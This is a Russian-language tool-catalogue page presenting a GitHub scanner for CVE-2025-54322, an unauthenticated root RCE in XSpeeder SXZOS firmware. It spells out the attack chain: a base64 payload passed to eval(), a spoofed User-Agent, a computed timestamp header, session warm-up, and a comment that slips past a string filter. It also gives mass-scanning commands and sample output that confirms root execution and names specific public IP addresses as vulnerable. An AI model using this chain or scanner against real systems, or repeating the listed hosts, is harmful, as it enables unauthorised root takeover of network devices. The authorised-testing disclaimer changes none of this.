Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-54322 — CVE-2025-54322 - XSpeeder SXZOS: быстрый поиск Pre-Auth RCE 0day | Kitploit
Инструменты/GitHubGitHub/sachinart/cve-2025-54322
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubsachinart/cve-2025-54322

CVE-2025-54322

CVE-2025-54322 - XSpeeder SXZOS: быстрый поиск Pre-Auth RCE 0day

Репозиторий
82119 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-54322 - XSpeeder SXZOS Сканер RCE без аутентификации

License Python CVE

Многопоточный сканер уязвимости CVE-2025-54322, неаутентифицированной уязвимости удаленного выполнения кода в прошивке XSpeeder SXZOS, затрагивающей ~70 000+ хостов по всему миру.

📋 Содержание

  • Об уязвимости
  • Возможности
  • Установка
  • Использование
  • Вывод
  • Отказ от ответственности
  • Благодарности
  • Автор

🔍 Об уязвимости

CVE-2025-54322 – это критическая уязвимость удаленного выполнения кода без аутентификации, обнаруженная в прошивке XSpeeder SXZOS, которая используется в SD-WAN-устройствах, маршрутизаторах и пограничном сетевом оборудовании.

Детали уязвимости

  • CVE ID: CVE-2025-54322
  • Вендор: XSpeeder (китайский сетевой вендор)
  • Затронутый продукт: Прошивка SXZOS
  • Тип уязвимости: Удаленное выполнение кода без аутентификации (RCE)
  • CVSS Score: 9.8+ (Критическая)
  • Вектор атаки: Сеть
  • Требуемые привилегии: Нет
  • Взаимодействие с пользователем: Нет
  • Воздействие: Полная компрометация системы с правами root

Технические детали

Уязвимость существует в веб-интерфейсе на основе Django прошивки SXZOS:

  1. Уязвимая конечная точка: /?title=ABC&oIp=XXX&chkid=[base64_payload]
  2. Основная причина: Небезопасное использование функции Python eval() для декодированных из base64 пользовательских данных
  3. Аутентификация: Не требуется (до аутентификации)
  4. Контекст выполнения: Права root
  5. Затронутые хосты: ~70 000+ публично доступных устройств по всему миру

Схема атаки

1. Вычислить временную метку для заголовка X-SXZ-R
2. Прогреть сессию через конечную точку /webInfos/
3. Создать вредоносную нагрузку со строкой обхода (#sUserCodexsPwd)
4. Закодировать нагрузку в Base64
5. Отправить эксплойт с ровно 3 параметрами запроса
6. Сервер декодирует и выполняет нагрузку
7. Команды выполняются с правами root

Механизмы обхода

Эксплойт обходит несколько уровней защиты:

  • Проверка User-Agent в Nginx: Подделывается с помощью SXZ/2.3
  • Временная метка: Вычисляемый заголовок X-SXZ-R: [0-6]
  • Требование сессии: Прогревается через /webInfos/
  • Фильтр строк: Обходится комментарием #sUserCodexsPwd
  • Количество параметров: Сохраняется ровно 3 параметра запроса

✨ Возможности

  • ✅ Многопоточное сканирование – одновременное тестирование нескольких целей
  • ✅ Обход SSL – обрабатывает самоподписанные и недействительные сертификаты
  • ✅ Умная логика повторных попыток – 2 попытки на цель
  • ✅ Чистый вывод – показывает только уязвимые хосты
  • ✅ Запись в файл в реальном времени – сохраняет результаты в vuln-confirm.txt немедленно
  • ✅ Отслеживание прогресса – обновления в реальном времени каждые 50 хостов
  • ✅ Потокобезопасные операции – безопасные конкурентные операции с файлами и консолью
  • ✅ Точное обнаружение – проверка выполнения команды на основе регулярных выражений
  • ✅ Логика, соответствующая PoC – следует оригинальной методологии эксплойта

🚀 Установка

Предварительные требования

  • Python 3.7 или выше
  • Менеджер пакетов pip

Настройка

# Клонировать репозиторий
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322

# Установить необходимые зависимости
pip install -r requirements.txt

Зависимости

Создайте файл requirements.txt:

requests>=2.31.0
urllib3>=2.0.0

📖 Использование

Базовое использование

python3 scanner.py targets.txt

Расширенное использование

# Сканирование с пользовательским количеством потоков (по умолчанию: 10)
python3 scanner.py targets.txt 20

# Сканирование с максимальным количеством потоков для ускорения
python3 scanner.py targets.txt 50

# Сканирование с консервативным количеством потоков
python3 scanner.py targets.txt 5

Формат файла целей

Создайте файл targets.txt с одной целью на строку:

https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local

Пример сессии

$ python3 scanner.py targets.txt 20

╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) Сканер RCE               ║
║     Проверка уязвимости RCE с root-доступом без аутентификации║
║     Показаны: ТОЛЬКО УЯЗВИМЫЕ ХОСТЫ                            ║
╚═══════════════════════════════════════════════════════════════╝

[*] Загружено 2338 целей из targets.txt
[*] Используется 20 конкурентных потоков
[*] Уязвимые хосты будут сохранены в: vuln-confirm.txt
[*] Запуск сканирования...

======================================================================
[+] УЯЗВИМ: https://27.40.80.93:4433
[+] Статус: УЯЗВИМ - RCE подтверждено
[+] HTTP статус: 500
[+] Вывод: uid=0(root) gid=0(root)
======================================================================

[*] Прогресс: 50/2338 | Найдено: 12 уязвимых
[*] Прогресс: 100/2338 | Найдено: 24 уязвимых

======================================================================
[*] СКАНИРОВАНИЕ ЗАВЕРШЕНО
======================================================================
[*] Общее время: 890.45 сек
[*] Всего просканировано целей: 2338
[*] Уязвимых хостов найдено: 156
[*] Уровень успеха: 6.67%
======================================================================

📊 Вывод

Консольный вывод

Сканер отображает:

  • Обнаружение уязвимых хостов в реальном времени
  • Обновления прогресса каждые 50 хостов
  • Итоговую сводку со статистикой
  • Чистые, организованные результаты

Вывод в файл (vuln-confirm.txt)

XSpeeder SXZOS CVE-2025-54322 - Уязвимые хосты
Сканирование начато: 2025-12-27 15:30:45
======================================================================

https://27.40.80.93:4433
Статус: УЯЗВИМ - RCE подтверждено
Вывод: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Статус: УЯЗВИМ - RCE подтверждено
Вывод: uid=0(root) gid=0(root)
----------------------------------------------------------------------

======================================================================
Сканирование завершено: 2025-12-27 15:45:30
Всего просканировано: 2338
Уязвимых: 156
Затраченное время: 890.45 сек

🎯 Рекомендации по потокам

Количество целейРекомендуемые потокиОжидаемое время
1-105 потоков~1-2 мин
10-5010 потоков~3-5 мин
50-10020 потоков~5-10 мин
100-50030 потоков~10-20 мин
500+40-50 потоков~20+ мин

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Юридическое уведомление

  • Тестируйте только те системы, которые принадлежат вам или на которые у вас есть явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам незаконен в большинстве юрисдикций
  • Автор не несет ответственности за неправильное использование этого инструмента
  • Используя этот инструмент, вы соглашаетесь использовать его ответственно и этично
  • Этот инструмент предназначен только для исследований в области безопасности и пентестинга

Ответственное раскрытие

Если вы обнаружите уязвимые системы:

  1. Не эксплуатируйте сверх подтверждения уязвимости
  2. Немедленно сообщите о находках владельцу системы
  3. Дайте разумное время для устранения
  4. Не раскрывайте публично конкретные уязвимые хосты
Скачать инструмент